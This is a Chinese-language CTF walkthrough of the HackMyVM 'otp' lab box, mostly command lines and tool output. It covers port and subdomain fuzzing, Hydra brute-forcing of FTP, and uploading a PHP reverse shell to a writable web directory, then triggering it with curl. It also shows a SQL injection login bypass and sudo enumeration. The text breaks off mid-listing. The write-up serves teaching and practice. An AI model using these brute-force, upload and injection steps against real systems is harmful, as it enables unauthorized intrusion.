![\"image-20240710135623020\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817518.png\")
<\/div>\n
![\"image-20240712150433355\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817521.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ rustscan -a $IP -- -A\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.0.107:21\nOpen 192.168.0.107:80\n\nPORT STATE SERVICE REASON VERSION\n21\/tcp open ftp syn-ack vsftpd 3.0.3\n80\/tcp open http syn-ack Apache httpd 2.4.51\n|_http-title: Did not follow redirect to http:\/\/otp.hmv\/\n|_http-server-header: Apache\/2.4.51 (Debian)\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\nService Info: Host: 127.0.1.1; OS: Unix<\/code><\/pre>\n\u505a\u4e00\u4e2a\u57df\u540d\u89e3\u6790\uff1a<\/p>\n
192.168.0.107 otp.hmv<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ gobuster dir -u http:\/\/otp.hmv -q -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,txt,html\n\/.php (Status: 403) [Size: 272]\n\/index.html (Status: 200) [Size: 11202]\n\/.html (Status: 403) [Size: 272]\n\/javascript (Status: 301) [Size: 307] [--> http:\/\/otp.hmv\/javascript\/]\n\/.php (Status: 403) [Size: 272]\n\/.html (Status: 403) [Size: 272]\n\/server-status (Status: 403) [Size: 272]<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240712150845197\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5c31\u662f\u4e00\u4e2a\u9ed8\u8ba4\u754c\u9762\uff0c\u6e90\u7801\u4e5f\u6ca1\u5565\u4e1c\u897f\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u5176\u4ed6\u7684\u76ee\u5f55\uff1a<\/p>\n
fuzz\u76ee\u5f55<\/h3>\n
\u6ca1\u53d1\u73b0\u5565\u654f\u611f\u76ee\u5f55\uff0c\u5c1d\u8bd5\u8fdb\u884cfuzz\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: FUZZ.otp.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 3482\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: FUZZ.otp.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 3482\n________________________________________________\n\nargon [Status: 200, Size: 25537, Words: 9965, Lines: 627, Duration: 89ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 365 req\/sec :: Duration: [0:00:58] :: Errors: 0 ::<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: otp.FUZZ.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20 \n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 20\n________________________________________________\n\notp [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 4ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5714 req\/sec :: Duration: [0:00:04] :: Errors: 0 ::\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP -H "Host: otp.otp.FUZZ.hmv" -w \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt --fw 20\n\n \/'___\\ \/'___\\ \/'___\\ \n \/\\ \\__\/ \/\\ \\__\/ __ __ \/\\ \\__\/ \n \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\ \n \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/ \n \\ \\_\\ \\ \\_\\ \\ \\____\/ \\ \\_\\ \n \\\/_\/ \\\/_\/ \\\/___\/ \\\/_\/ \n\n v2.1.0-dev\n________________________________________________\n\n :: Method : GET\n :: URL : http:\/\/192.168.0.107\n :: Wordlist : FUZZ: \/usr\/share\/seclists\/Discovery\/DNS\/subdomains-top1million-20000.txt\n :: Header : Host: otp.otp.FUZZ.hmv\n :: Follow redirects : false\n :: Calibration : false\n :: Timeout : 10\n :: Threads : 40\n :: Matcher : Response status: 200-299,301,302,307,401,403,405,500\n :: Filter : Response words: 20\n________________________________________________\n\notp [Status: 200, Size: 11202, Words: 3482, Lines: 373, Duration: 2ms]\n:: Progress: [19966\/19966] :: Job [1\/1] :: 5882 req\/sec :: Duration: [0:00:05] :: Errors: 0 ::<\/code><\/pre>\n\u4e0b\u9762\u8fd9\u4e2a\u4f3c\u4e4e\u4e0d\u592a\u9760\u8c31\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u4e0a\u9762\u90a3\u4e2a\uff1a<\/p>\n
192.168.0.107 argon.otp.hmv<\/code><\/pre>\n\u5c1d\u8bd5\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u6e90\u4ee3\u7801\u6cc4\u9732<\/h3>\n
\u627e\u5230\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff0c\u53d1\u73b0\u7248\u672c\uff1a<\/p>\n
view-source:http:\/\/argon.otp.hmv\/login.php<\/code><\/pre>\n<\/div><\/p>\n\u627e\u5230token:<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u5176\u4ed6\u754c\u9762\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u8d26\u53f7\u5bc6\u7801\uff0c\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
<\/div><\/p>\n\u5f97\u5230\u4e00\u7ec4\u7528\u6237\uff1a<\/p>\n
otpuser\n#4ck!ng!s!nMybl0od<\/code><\/pre>\n\u767b\u5f55\u4e0a\u53bb\uff1a<\/p>\n
<\/div><\/p>\n\u53ea\u6709\u8fd9\u53e5\u8bdd\uff0c\u6e90\u4ee3\u7801\u4e5f\u6ca1\u4e1c\u897f\u3002<\/p>\n
\u7206\u7834ftp<\/h3>\n
ftp\u5c1d\u8bd5\u9ed8\u8ba4\u767b\u5f55\u65b9\u5f0f\u65e0\u6cd5\u8fdb\u884c\u767b\u5f55\uff0c\u5c1d\u8bd5\u8fd9\u4e2a\u7528\u6237\u540d\u8fdb\u884c\u7206\u7834\uff0c\u540c\u65f6\u5c1d\u8bd5\u4e86\u4e0a\u9762\u90a3\u4e2a\u8d26\u53f7\u5bc6\u7801\u65e0\u6cd5\u767b\u5f55\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 03:42:52\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1\/p:14344399), ~896525 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[STATUS] 258.00 tries\/min, 258 tries in 00:01h, 14344141 to do in 926:38h, 16 active\n[STATUS] 259.67 tries\/min, 779 tries in 00:03h, 14343620 to do in 920:39h, 16 active\n[STATUS] 268.86 tries\/min, 1882 tries in 00:07h, 14342517 to do in 889:07h, 16 active\n^C^C^Z\nzsh: suspended hydra -l david -P \/usr\/share\/wordlists\/rockyou.txt ftp:\/\/$IP 2> \/dev\/null<\/code><\/pre>\n\u6ca1\u7206\u7834\u51fa\u6765\uff0c\u5c1d\u8bd5\uff0c\u8fdb\u884c\u793e\u5de5\u5b57\u5178\u7206\u7834\uff1ahttps:\/\/www.ddosi.org\/pass8\/<\/a><\/p>\n\u5c1d\u8bd5\u7206\u7834\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ hydra -l david -P pass ftp:\/\/$IP 2>\/dev\/null\nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-07-12 04:18:03\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14650 login tries (l:1\/p:14650), ~916 tries per task\n[DATA] attacking ftp:\/\/192.168.0.107:21\/\n[21][ftp] host: 192.168.0.107 login: david password: DAVID\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-07-12 04:18:17<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ftp $IP\nConnected to 192.168.0.107.\n220 (vsFTPd 3.0.3)\nName (192.168.0.107:kali): david\n331 Please specify the password.\nPassword: \n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp> ls -la\n229 Entering Extended Passive Mode (|||60936|)\n150 Here comes the directory listing.\ndrwxr-xrwx 2 0 115 4096 Nov 22 2021 .\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 ..\n-rw-r--r-- 1 1001 1001 125 Nov 19 2021 important_note.txt\n226 Directory send OK.\nftp> get important_note.txt\nlocal: important_note.txt remote: important_note.txt\n229 Entering Extended Passive Mode (|||64865|)\n150 Opening BINARY mode data connection for important_note.txt (125 bytes).\n100% |***************************************************************************************************************************************| 125 6.29 KiB\/s 00:00 ETA\n226 Transfer complete.\n125 bytes received in 00:00 (5.57 KiB\/s)\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||57148|)\n150 Here comes the directory listing.\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 .\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 ..\ndrwxr-xrwx 2 0 115 4096 Nov 22 2021 ftp\n226 Directory send OK.\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||18938|)\n150 Here comes the directory listing.\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 .\ndrwxr-xr-x 18 0 0 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 0 0 7 Nov 17 2021 bin -> usr\/bin\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 boot\ndrwxr-xr-x 17 0 0 3140 Jul 12 03:03 dev\ndrwxr-xr-x 74 0 0 4096 Jul 12 03:03 etc\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 home\nlrwxrwxrwx 1 0 0 30 Nov 17 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 30 Nov 17 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 7 Nov 17 2021 lib -> usr\/lib\nlrwxrwxrwx 1 0 0 9 Nov 17 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 0 0 9 Nov 17 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 0 0 10 Nov 17 2021 libx32 -> usr\/libx32\ndrwx------ 2 0 0 16384 Nov 17 2021 lost+found\ndrwxr-xr-x 3 0 0 4096 Nov 17 2021 media\ndrwxr-xr-x 2 0 0 4096 Nov 17 2021 mnt\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 opt\ndr-xr-xr-x 167 0 0 0 Jul 12 03:03 proc\ndrwx------ 2 0 0 4096 Nov 23 2021 root\ndrwxr-xr-x 20 0 0 540 Jul 12 03:03 run\nlrwxrwxrwx 1 0 0 8 Nov 17 2021 sbin -> usr\/sbin\ndrwxr-xr-x 3 0 0 4096 Nov 19 2021 srv\ndr-xr-xr-x 13 0 0 0 Jul 12 03:03 sys\ndrwxrwxrwt 10 0 0 4096 Jul 12 04:09 tmp\ndrwxr-xr-x 14 0 0 4096 Nov 17 2021 usr\ndrwxr-xr-x 12 0 0 4096 Nov 17 2021 var\nlrwxrwxrwx 1 0 0 27 Nov 17 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 0 0 27 Nov 17 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n226 Directory send OK.\nftp> cd \/var\/www\/html\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||27952|)\n150 Here comes the directory listing.\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 ..\n-rw-r--r-- 1 0 0 114 Nov 21 2021 .htaccess\n-rw-r--r-- 1 0 0 11202 Nov 19 2021 index.html\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||20123|)\n553 Could not create file.\nftp> cd ..\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38300|)\n150 Here comes the directory listing.\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 .\ndrwxr-xr-x 12 0 0 4096 Nov 17 2021 ..\ndrwxr-xr-x 2 0 0 4096 Nov 23 2021 html\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 otp\n226 Directory send OK.\nftp> cd otp\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38040|)\n150 Here comes the directory listing.\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 22 2021 ..\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 argon\ndrwxr-x--x 2 0 0 4096 Nov 23 2021 totp\n226 Directory send OK.\nftp> cd argon\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||38922|)\n150 Here comes the directory listing.\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 .\ndrwxr-xr-x 4 0 0 4096 Nov 19 2021 ..\n-rw-r--r-- 1 0 0 10 Feb 05 2020 .gitignore\n-rw-r--r-- 1 0 0 404 Feb 05 2020 CHANGELOG.md\n-rw-r--r-- 1 0 0 384 Feb 05 2020 ISSUE_TEMPLATE.md\n-rw-r--r-- 1 0 0 1101 Feb 05 2020 LICENSE.md\n-rw-r--r-- 1 0 0 12363 Feb 05 2020 README.md\ndrwxr-xr-x 8 0 0 4096 Feb 05 2020 assets\n-rw-r--r-- 1 0 0 221 Nov 22 2021 cr3d5_123.html\ndrwxr-xr-x 2 0 0 4096 Feb 05 2020 docs\n-rw-r--r-- 1 0 0 856 Feb 05 2020 gulpfile.js\n-rw-r--r-- 1 0 0 25537 Nov 22 2021 index.html\n-rw-r--r-- 1 0 0 7554 Nov 22 2021 login.php\n-rw-r--r-- 1 0 0 1280 Feb 05 2020 package.json\n-rw-r--r-- 1 0 0 19070 Nov 22 2021 profile.html\n-rw-r--r-- 1 0 0 50995 Nov 22 2021 tables.html\ndrwxrwxrwx 2 0 1001 4096 Nov 23 2021 u9l04d_\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||60528|)\n553 Could not create file.\nftp> cd u9l04d_\n250 Directory successfully changed.\nftp> ls -la\n229 Entering Extended Passive Mode (|||42817|)\n150 Here comes the directory listing.\ndrwxrwxrwx 2 0 1001 4096 Nov 23 2021 .\ndrwxr-xr-x 5 0 0 4096 Nov 23 2021 ..\n226 Directory send OK.\nftp> put revshell.php \nlocal: revshell.php remote: revshell.php\n229 Entering Extended Passive Mode (|||8011|)\n150 Ok to send data.\n100% |***************************************************************************************************************************************| 3911 14.07 MiB\/s 00:00 ETA\n226 Transfer complete.\n3911 bytes sent in 00:00 (723.63 KiB\/s)\nftp> exit\n221 Goodbye.<\/code><\/pre>\n\u4e0a\u4f20\u4e86\u4e00\u4e2a\u53cd\u5f39shell\uff01\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n
curl http:\/\/argon.otp.hmv\/u9l04d_\/revshell.php<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n(remote) www-data@otp:\/$ sudo -l\nMatching Defaults entries for www-data on otp:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on otp:\n (!avijneyam) NOPASSWD: \/bin\/bash\n(remote) www-data@otp:\/$ sudo -u !avijneyam \/bin\/bash\nbash: !avijneyam: event not found\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep "\/bin\/??sh"\n(remote) www-data@otp:\/$ cat \/etc\/passwd | grep "\/bin\/bash"\nroot:x:0:0:root:\/root:\/bin\/bash\navijneyam:x:1000:1000:Avijneyam,,,:\/home\/avijneyam:\/bin\/bash\ndavid:x:1001:1001::\/srv\/ftp:\/bin\/bash\n(remote) www-data@otp:\/$ sudo -u root \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u david \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required\n(remote) www-data@otp:\/$ sudo -u avijneyam \/bin\/bash\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n #1) Respect the privacy of others.\n #2) Think before you type.\n #3) With great power comes great responsibility.\n\n[sudo] password for www-data: \nsudo: a password is required<\/code><\/pre>\n\u53d1\u73b0\u4e0d\u662f\u6211\u60f3\u7684\u90a3\u6837\uff0c\u6240\u6709\u7684\u90fd\u767b\u4e0d\u4e0a\u53bb\uff0c\u518d\u7ffb\u7ffb\uff1a<\/p>\n
(remote) www-data@otp:\/$ cd ~\n(remote) www-data@otp:\/var\/www$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 22 2021 .\ndrwxr-xr-x 12 root root 4096 Nov 17 2021 ..\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 html\ndrwxr-xr-x 4 root root 4096 Nov 19 2021 otp\n(remote) www-data@otp:\/var\/www$ cd otp\n(remote) www-data@otp:\/var\/www\/otp$ ls -la\ntotal 16\ndrwxr-xr-x 4 root root 4096 Nov 19 2021 .\ndrwxr-xr-x 4 root root 4096 Nov 22 2021 ..\ndrwxr-xr-x 5 root root 4096 Nov 23 2021 argon\ndrwxr-x--x 2 root root 4096 Nov 23 2021 totp\n(remote) www-data@otp:\/var\/www\/otp$ cd totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/hosts\n127.0.0.1 localhost\n127.0.1.1 otp\n127.0.0.1 otp.hmv\n\n# The following lines are desirable for IPv6 capable hosts\n::1 localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n(remote) www-data@otp:\/var\/www\/otp\/totp$ grep -ra "totp" \/etc\/apache2\n\/etc\/apache2\/sites-available\/totp.conf: ServerName totp.otp.hmv\n\/etc\/apache2\/sites-available\/totp.conf: DocumentRoot \/var\/www\/otp\/totp\n(remote) www-data@otp:\/var\/www\/otp\/totp$ cat \/etc\/apache2\/sites-available\/totp.conf \n<VirtualHost *:80>\n # The ServerName directive sets the request scheme, hostname and port that\n # the server uses to identify itself. This is used when creating\n # redirection URLs. In the context of virtual hosts, the ServerName\n # specifies what hostname must appear in the request's Host: header to\n # match this virtual host. For the default virtual host (this file) this\n # value is not decisive as it is used as a last resort host regardless.\n # However, you must set it for any further virtual host explicitly.\n ServerName totp.otp.hmv\n\n #ServerAdmin webmaster@localhost\n DocumentRoot \/var\/www\/otp\/totp\n ErrorLog ${APACHE_LOG_DIR}\/error.log\n CustomLog ${APACHE_LOG_DIR}\/access.log combined\n\n # For most configuration files from conf-available\/, which are\n # enabled or disabled at a global level, it is possible to\n # include a line for only one particular virtual host. For example the\n # following line enables the CGI configuration for this host only\n # after it has been globally disabled with "a2disconf".\n #Include conf-available\/serve-cgi-bin.conf\n<\/VirtualHost>\n\n# vim: syntax=apache ts=4 sw=4 sts=4 sr noet<\/code><\/pre>\n\u6539hosts\u518d\u6b21\u8bbf\u95ee<\/h3>\n192.168.0.107 totp.otp.hmv<\/code><\/pre>\n\u518d\u6b21\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
<\/div><\/p>\n\u53d1\u73b0\u662f\u4e00\u4e2a\u767b\u5f55\u754c\u9762\uff0c\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff1a1' or '1' = '1<\/code>\uff0c\u53d1\u73b0\u8fdb\u6765\u4e86\uff01<\/p>\n<\/div><\/p>\n\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u6ca1\u4e1c\u897f\uff0c\u5c1d\u8bd5\u6ce8\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\u6e90\u4ee3\u7801\uff1a<\/p>\n
avijneyam:*******************___Cuz_HackMyVM_iS_theRe_Only_4_y0u_:)\n\nAdroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\nSysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen<\/code><\/pre>\n\u5f97\u5230\u4e00\u4e2a\u7591\u4f3c\u5bc6\u7801\u4ee5\u53ca\u5b57\u5178\uff0c\u8fd9\u4e2a\u9875\u9762\u5c31\u6ca1\u5176\u4ed6\u4e1c\u897f\u4e86\uff0c\u7ee7\u7eed\u641c\u96c6\uff1a<\/p>\n
(remote) www-data@otp:\/home$ cd \/srv\/ftp\n(remote) www-data@otp:\/srv\/ftp$ ls -la\ntotal 12\ndrwxr-xrwx 2 root ftp 4096 Nov 22 2021 .\ndrwxr-xr-x 3 root root 4096 Nov 19 2021 ..\n-rw-r--r-- 1 david david 125 Nov 19 2021 important_note.txt\n(remote) www-data@otp:\/srv\/ftp$ cat important_note.txt \n"Many times, the idea we come up with is not to fit for the current times but if launched at the right time can do wonders."\n(remote) www-data@otp:\/srv\/ftp$ cd \/\n(remote) www-data@otp:\/$ ls -la\ntotal 68\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\nlrwxrwxrwx 1 root root 7 Nov 17 2021 bin -> usr\/bin\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 boot\ndrwxr-xr-x 17 root root 3140 Jul 12 03:03 dev\ndrwxr-xr-x 74 root root 4096 Jul 12 03:03 etc\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 home\nlrwxrwxrwx 1 root root 30 Nov 17 2021 initrd.img -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 30 Nov 17 2021 initrd.img.old -> boot\/initrd.img-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 7 Nov 17 2021 lib -> usr\/lib\nlrwxrwxrwx 1 root root 9 Nov 17 2021 lib32 -> usr\/lib32\nlrwxrwxrwx 1 root root 9 Nov 17 2021 lib64 -> usr\/lib64\nlrwxrwxrwx 1 root root 10 Nov 17 2021 libx32 -> usr\/libx32\ndrwx------ 2 root root 16384 Nov 17 2021 lost+found\ndrwxr-xr-x 3 root root 4096 Nov 17 2021 media\ndrwxr-xr-x 2 root root 4096 Nov 17 2021 mnt\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 opt\ndr-xr-xr-x 155 root root 0 Jul 12 03:03 proc\ndrwx------ 2 root root 4096 Nov 23 2021 root\ndrwxr-xr-x 20 root root 540 Jul 12 03:03 run\nlrwxrwxrwx 1 root root 8 Nov 17 2021 sbin -> usr\/sbin\ndrwxr-xr-x 3 root root 4096 Nov 19 2021 srv\ndr-xr-xr-x 13 root root 0 Jul 12 03:03 sys\ndrwxrwxrwt 2 root root 4096 Jul 12 03:03 tmp\ndrwxr-xr-x 14 root root 4096 Nov 17 2021 usr\ndrwxr-xr-x 12 root root 4096 Nov 17 2021 var\nlrwxrwxrwx 1 root root 27 Nov 17 2021 vmlinuz -> boot\/vmlinuz-5.10.0-9-amd64\nlrwxrwxrwx 1 root root 27 Nov 17 2021 vmlinuz.old -> boot\/vmlinuz-5.10.0-9-amd64\n(remote) www-data@otp:\/$ cd opt\n(remote) www-data@otp:\/opt$ ls -la\ntotal 16\ndrwxr-xr-x 2 root root 4096 Nov 23 2021 .\ndrwxr-xr-x 18 root root 4096 Nov 17 2021 ..\n-r-------- 1 www-data www-data 2022 